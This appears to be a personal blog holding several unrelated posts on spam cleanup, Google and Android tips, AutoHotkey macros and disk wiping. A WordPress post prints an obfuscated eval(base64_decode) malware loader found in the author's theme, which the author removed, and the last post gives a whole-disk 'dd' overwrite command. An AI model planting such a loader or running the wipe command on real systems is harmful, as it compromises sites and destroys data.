Lee.org

I’m cleaning up yet another spammer attack. This time the SWARM wiki,  a Mediawiki site got attacked.

I’m still diagnosing it but so far the spam only shows it’s head in the following situation:

1. I edit a mediawiki page
2. Hit “Save Page”
3. The spam page appears, which starts out “(Cialis, Levitra, Viagra) Online in Canada” and “He would place his stout woman of thirty-six felt sufficiently flattered by..”

I’m hunting it down… I’ll tell you what I find. If you’ve seen this, please holler.
Apparently Google has seen this on my site for at least a little while :-(

I’ll be presenting my 30 minute bread talk at East Bay Maker Faire, Hurray!

They asked:

If your exhibit uses radio frequencies, please elaborate here about what frequency your exhibit uses.

My answer:

I’ll be using 400 terahertz thru 789 terahertz on stage.

I’m such a comedian.

Since switching from Outlook to Gmail, I’ve been nervous about not being able to back up things like my contacts and email. There’s a new service called Google Takeout that lets me back up lots of my data locally. Sweet!

Here’s where to look:
Google Takeout

The Data Liberation Front – a related Google blog.

I put a note in my calendar to run the backup every couple months. :-)

They currently back up
+1
Buzz
Contacts and Circles
Picasa web albums
Profile
Stream

If you think the following would be a good idea, write a +1 Reply to my post in Suggest a Google Labs Feature.

Subject:Sending email creates a followup calendar item

Sometimes I want to be reminded to followup on an email that I send. I propose that users be able to create Google Calendar items that are automatically populated with email contents.

The best thing is that most of this functionality is already available using the Google Calendar Event Publisher!

Here is proposed functionality:

Next to the email “Send” button, there is a “Send and Calendar” button.
When the “Send and Calendar” button is pushed, first, the email is sent, then a Calendar item is created and displayed.

* The original email Subject is made into the Calendar item Subject, with a prefix of “Followup: ” added.
* The original email Body is made into the Body of the Calendar item.
* The date on the Calendar item is set to a changeable value, n days in the future.
* That’s it. All other Calendar defaults are left the same.

It is then up to the author to either “Save” or “Discard” this new “Followup calendar” item.

I would so love this feature. Please pretty please!

I wiped my Samsung Galaxy S / AT&T Captivate Android phone to try to fix a problem with sound (I’ll hopefully talk about that in a future post). And I came across a problem with the Android Marketplace. It’s possible this problem has existed for a while and I just noticed ithttps://market.android.com/account | Settings reported “There are no Android devices associated with this account”.

There is a lot of discussion and attempted answers on this Google Forum. Here is what fixed the problem for me:

(via) Thanks Droid-Eye!

Droid-Eye
Collapse
A FIX FOR SOME!!!!

For those of you who tried this and it didn’t work, or don’t have phone numbers (tablets,) try this, it worked for me.

On your Android: menu>settings>applications>manage applications>all (tab at top)>Market>clear data.

This will clear your data and log your Android out of the market. When you launch the market app and agree to the terms of service again, it will sign you sign your Android back into the market and it should be visible on the web market.

I have much bemoaned the loss of Etherpad to the Google. The project was open sourced so, in theory, anyone can run an Etherpad server. But it does take a little bit of nerd accumen to get the thing going. I’ve heard of a couple groups that have started servers… PiratePad, TypeWith.me, Sync.in, EtherPad Foundation, iEtherPad.com. But I’ve been wary of trusting most of these guys. I mean, come on, I’m going to write semi-confidential things on PiratePad?

Here’s one I think I can trust:
etherpad.mozilla.org:9000

My WordPress blog had been hacked. It displayed ads for stupid things in the far lower right corner of some blog pages. It looks like it displayed ads on just 1 in 10 of my pages, especially “Category” pages. You might want to take a peek on your own WordPress blog to make sure it hasn’t happened to you.

Here’s where the bad code was and how I fixed it.

The header.php file of my theme had been altered. It began:

<?define('USE_DIRA', '/blog/wp-content/themes/default/images/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs="));?>


That code was obviously running code in my /blog/wp-content/themes/default/images/ directory.

Curiously, the “modified date” on the header.php file must have been hacked. I know this because the file has a “last modifed” date of April 2009, however the backup of my website in October 2010 doesn’t have the spamming code. Therefore, the hacked code must have been added more recently.

2 files had been added to the /blog/wp-content/themes/default/images/ directory on the blog:
403.php
links.db

Here are the most suspicious parts of 403.php

define('_SAPE_USER', '466c19cd8253185aebaab9f182431010');
...
eval(@base64_decode("JGJvdGlwcyA9IGFycmF5KAkN


“SAPE” is a known malware (via)

You should never have any “eval base64” code in your WordPress installation. It’s almost always some piece of code trying to hide itself.
————————————————–

I removed the malicious code from my header.php and deleted 403.php and links.db from the default theme. Done.
Update: read the comments!

I’ve been using Autohotkey for keyboard macros for a while now. I find it virtually indispensable to work quickly and productively. It rocks.

Here are the most useful macros I use on a regular basis, lifted straight from my AutoHotkey.ahk:

; hit ctrl-space to make the current window always on top. From http://www.labnol.org/software/tutorials/keep-window-always-on-top/5213/
^SPACE:: Winset, Alwaysontop, , A

:o:..3::My address
:o:..4::415-…My phone number
:o:..9::94110

^!r:: ; Run gedit with Ctrl-Alt-r
;IfWinExist, Notepad++
; I found the name of the window by using “AutoIt3 Window Spy”, which comes with autohotkey
IfWinExist, ahk_class gdkWindowToplevel
WinActivate
else
Run, “C:\Program Files\gedit\bin\gedit.exe”
return

^!c:: ; Run Calc with Ctrl-Alt-c
IfWinExist, Moffsoft FreeCalc
WinActivate
else
; Run, calc.exe
Run, “C:\Program Files\Moffsoft FreeCalc\MoffFreeCalc.exe”
return

^!t:: ; Run Truecrypt with Ctrl-Alt-t
IfWinExist, TrueCrypt
WinActivate
else
; Run, calc.exe
Run, “C:\Documents and Settings\Lee\Desktop\My Truecrypt file.tc”
return

^!d:: ; Run Chrome with Ctrl-Alt-d
IfWinExist, New Tab – Google Chrome ; If there is already a blank window, bring it to front
{
WinActivate, New Tab – Google Chrome
}

else
{
IfWinExist, ahk_class Chrome_WidgetWin_0 ; grab a Chrome window and click ctrl-n to make a new window
{
WinActivate
Send ^n
}
}

WinWaitActive, New Tab – Google Chrome, , 1 ; wait to see if the command worked

IfWinNotExist, New Tab – Google Chrome ; if we don’t have a new chrome window by now (IE, clicking ctrl-n didn’t work) then

start it manually
{
Run, “C:\Documents and Settings\Lee\Local Settings\Application Data\Google\Chrome\Application\chrome.exe”
WinWait, New Tab – Google Chrome, , 3
WinActivate, New Tab – Google Chrome
}

return

^!w:: ; Run Windows Explorer with Ctrl-Alt-w
IfWinExist, My Documents
Run, explorer.exe
else
Run, explorer.exe
return

:o:.address::My full address{enter}San Francisco, CA 94110{enter}

:0:.80::123456789012345678901234567890123456 >40< 3456789012345678901234567890123456 >80{enter}

:o:.–::{- 50}{down}{home}
:o:.-=::{- 50}{enter}

:o:.=-::{enter}{- 50}{ENTER}{- 50}{down}{home}
:o:.==::{enter}{- 50}{ENTER}{- 50}{enter}

:o:.ms::——– Original Message ————-{enter}

:o:.me::——– End of Original Message ——{enter}

:o:.ss::—- Start of Snippet —-{home}{down}

:o:.se::—- End of Snippet —-{enter}

:o:.s::San Francisco
:o:.sc::San Francisco, CA
:o:.c:: California

:o:.b::Berkeley
:o:.bc::Berkeley, CA

:o:.date:: ; This hotstring replaces “]d” with the current date and time.
FormatTime, CurrentDateTime,, M/d/yyyy h:mm tt ; It will look like 9/1/2005 3:53 PM
SetKeyDelay 0 ; This sets the keystrokes below to be sent faster than the default.
Send %CurrentDateTime%
return

To get you excited in case you can’t read this configuration file, here are some examples:

:o:..3::My address

I type “..3(Return)” and it replaces that text with my street address. I use this all the time when buying stuff on websites. Oh, it’s a “3” because my address starts with a 3, making it easy to remember

^!d:: ; Run Chrome with Ctrl-Alt-d
…

I hit Control-Alt-D and it starts Google Chrome. Or if there is already a blank Chrome window open, it gives it the focus. This is sooo much faster than picking up the mouse and clicking the icon a thousand times a day.

^!c:: ; Run Calc with Ctrl-Alt-c

Pull up the calculator with a quick key combination

:o:.ms::——– Original Message ————-{enter}

I type “.ms” (short for “message start”) and it replaces it with, well, I’ll let you guess. Similarly, “.me” is short for “message end”.

I just got an Android phone, AT&T Samsung Captivate SGH-i897.

What are the essentials for this phone? Here’s what I’ve got so far to change the phone from PITA to awesome

Google Voice – ($free) to avoid the ancient “You have 2 new messages. To listen to your messages, press 1” and replace it with visual voicemail on my phone and computer. Installing it was ridiculously easy after spending an hour hunting on the forums. I went to my (pre-existing) google voice account online and clicked Settings | Voice Settings | Activate Voicemail next to the description of my phone. I typed a few characters into my phone to enable forwarding and Tada!

Touch Calendar Free – ($free) so I can look at my entire calendar at a glance. I can’t navigate around it smoothly but it’s better than the default calendar

RealCalc – ($free) stupid Samsung put the buttons on their calculator in the wrong places! It’s stupid! RealCalc has the buttons in the right places and a lot of bells and whistles that don’t get too in the way

Hi-Q MP3 Recorder – ($3.00) the built in voice recorder sounds like crap and has a mediocre interface. This one is a lot better.

Screen Filter – ($free) The phone is blindingly bright at night. Even at the lowest brightness, it is an excellent flashlight. It is dangerously bright when trying to use the GPS in the car. Screen filter works well to put some kind of “software filter” in front of the screen. Sometimes it turns itself off but it mostly works great.

No fix yet – The AT&T Samsung Captivate (SGH-i897) has 4 buttons at the bottom of the screen. Actually they are “soft” buttons with no tactile feedback. Well, after 3 seconds of inactivity, they turn off, making it impossible to find the buttons in the dark! I don’t have a fix for this yet. I heard of an app called something like “Keep the Lights On” or some such but I lost the reference to it and I have to root my phone to install it. PITA.

I’m still not ready to switch to Gmail as my primary email but it’s working well enough. I’m not switching because: 1- last week the gmail at the office was running slow a while due to Google’s fault. 2- Also last week Google switched our office’s Google Docs interface to something newer and betterer. I wish they had asked/told us before doing that!! I don’t care how new and exciting the new whatchamacallit is, not mentioning that things will be changing freaks me out. It reminds me of the absolute power they have over my email.

NoLed – ($free) when you miss a call, there is no blinking light on the phone telling you that you missed it. Uncool. NoLed fixes that. It might draw too much battery, the jury is still out.

3G Watchdog – ($free) It is difficult… impossible to tell what apps are doing on the phone. They could be downloading porn, burning up your monthly data quota. This should tell me if that happens. The ethos of the platform is pretty much that programs can run in the background whenever they want. That kinda freaks me out.

Battery Graph – ($free) I’m a program to keep track of my battery usage because I haven’t really figured out what drains the battery the most. Some users see 5 hours of battery life, some 30. I really really want to have 30 and not have to think about it.

Installing programs is nerve-wracking because so many apps want access to my data. Does Facebook need access to my Contacts list? If I give that cute new game the power to read and write to the SD card, will it be able to steal data and send it to Russian spammers? The “community” is no help because as of yet, I haven’t come across any group that has recognized malware; there is no procedure for dealing with malware!

The places to look for help appear to be (in decreasing order of usefulness)
http://googlemobile.blogspot.com/
http://androidforums.com/
http://www.xda-developers.com/
http://www.appbrain.com/
http://www.androidcentral.com/
http://www.androlib.com/ ??
http://www.samsung.com/us/support/owners/product/SGH-I897ZKAATT

So, dear reader, what am I missing? Comments welcome.

The instructions from PendriveLinux.com work almost perfectly for me. There is one bother that makes the instructions from Pendrivelinux not work but I figured out a workaround :-)!

1. Download the  dban-2.2.6_i586.iso
2. Download and run  Universal USB Installer, select DBAN 2.2.6 from the drop down list and follow the onscreen instructions
3. Once the installation to USB is complete, restart your PC and set your  BIOS or Boot Menu to boot from the USB device, save your changes and reboot

If all went well, you should be booting from your  DBAN USB.

Notes: The DBAN autonuke feature may also Nuke the Flash Drive (and as usual, any other drive it detects). I am not sure how to prevent this from happening. So if you use the autonuke feature, you might wipe DBAN from the USB Flash Drive as well.

Here is how to prevent autonuke from wiping the thumbdrive: remove the thumbdrive after the dban has loaded but before it has started wiping drives.

Dban has started. I just typed "autonuke" and the dban.bzi system is being loaded.

The dban image finished loading and it is looking for hard drives to wipe. Now is the time to remove the thumbdrive! You have about 10 full seconds to remove the drive.

Apparently, dban fully loads itself in memory because at the end of the wiping session, it shows a message saying that it has completed it’s job. It doesn’t hang or anything nasty.

When I tried to use  interactive mode on dban (to avoid autonuke destroying the data on my flash drive), dban crashed :-(. I’ve seen many complaints of this online with no fixes.

Here is another way I use to wipe hard drives. It isn’t as high security, but it’s pretty good.

1. Use the System Rescue CD bootable thumbdrive image built by my coworker
2. xinit (xwindows yay)
3. gparted (see what drives we’ve got and unallocate the partitions)
4. dd if=/dev/zero of=/dev/sda (and sdb, sdc etc to run other terminal windows) bs=16777216 (a 160 gig drive…) count=10240